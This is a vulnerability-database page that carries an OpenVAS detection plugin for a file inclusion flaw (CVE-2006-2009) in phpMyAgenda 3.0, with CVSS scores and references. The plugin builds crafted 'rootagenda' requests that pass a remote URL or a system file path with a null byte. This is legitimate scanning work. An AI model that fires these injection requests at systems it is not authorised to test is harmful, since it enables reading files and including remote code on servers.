Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2008 Ferdy RiphagenOPENVAS:1361412562310200002
HistoryAug 22, 2008 - 12:00 a.m.

phpMyAgenda 3.0 File Inclusion Vulnerability

2008-08-2200:00:00
Copyright (C) 2008 Ferdy Riphagen
plugins.openvas.org
15

6.6 Medium

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.251 Low

EPSS

Percentile

96.6%

JSON

phpMyAgenda is prone to a file inclusion vulnerability.

# SPDX-FileCopyrightText: 2008 Ferdy Riphagen
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.200002");
  script_version("2023-12-13T05:05:23+0000");
  script_tag(name:"last_modification", value:"2023-12-13 05:05:23 +0000 (Wed, 13 Dec 2023)");
  script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2006-2009");
  script_name("phpMyAgenda 3.0 File Inclusion Vulnerability");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2008 Ferdy Riphagen");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl", "os_detection.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/431862/30/0/threaded");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/17670");

  script_tag(name:"summary", value:"phpMyAgenda is prone to a file inclusion vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"The application does not sanitize the 'rootagenda' parameter in
  some of it's files. This allows an attacker to include arbitrary files from remote systems and
  parse them with privileges of the account under which the web server is started.

  This vulnerability exists if PHP's 'register_globals' & 'magic_quotes_gpc' are both enabled for
  the local file inclusions flaw.

  And if 'allow_url_fopen' is also enabled remote file inclusions are also possible.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  script_tag(name:"solution_type", value:"WillNotFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("misc_func.inc");

port = http_get_port(default:80);
if (!http_can_host_php(port:port))
  exit(0);

foreach dir(make_list_unique("/phpmyagenda", "/agenda", http_cgi_dirs(port:port))) {

  if(dir == "/")
    dir = "";

  res = http_get_cache(item:dir + "/agenda.php3", port:port);
  if(res && egrep(pattern:"<a href=[^?]+\?modeagenda=calendar", string:res)) {

    files = traversal_files();

    foreach pattern(keys(files)) {

      file[0] = string("http://", get_host_name(), dir, "/bugreport.txt");
      file[1] = "/" + files[pattern];

      url = dir + "/infoevent.php3?rootagenda=" + file[0] + "%00";
      req = http_get(item:url, port:port);
      res = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
      if (!res)
        continue;

      if ("Bug report for phpMyAgenda" >< res) {
        report = http_report_vuln_url(port:port, url:url);
        security_message(port:port, data:report);
        exit(0);
      }
      else {
        # Maybe PHP's 'allow_url_fopen' is set to Off on the remote host.
        # In this case, try a local file inclusion.
        url = dir + "/infoevent.php3?rootagenda=" + file[1] + "%00";
        req2 = http_get(item:url, port:port);
        res2 = http_keepalive_send_recv(data:req2, bodyonly:TRUE, port:port);
        if (!res)
          continue;

        if (egrep(pattern:pattern, string:res2)) {
          # PHP's 'register_globals' and 'magic_quotes_gpc' are enabled on the remote host.
          report = http_report_vuln_url(port:port, url:url);
          security_message(port:port, data:report);
          exit(0);
        }
      }
    }
  }
}

exit(99);

Related

cve 2
nessus 1
openvas 1
prion 1
cve
cve
CVE-2006-2009
2006-04-25 12:50:00
CVE-2006-5132
2006-10-03 04:03:00
nessus
nessus
phpMyAgenda rootagenda Parameter File Include Vulnerability
2006-05-03 00:00:00
openvas
openvas
phpMyAgenda version 3.0 File Inclusion Vulnerability
2008-08-22 00:00:00
prion
prion
Remote file inclusion
2006-04-25 12:50:00

6.6 Medium

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.251 Low

EPSS

Percentile

96.6%

JSON
Related for OPENVAS:1361412562310200002
cve2nessus1openvas1prion1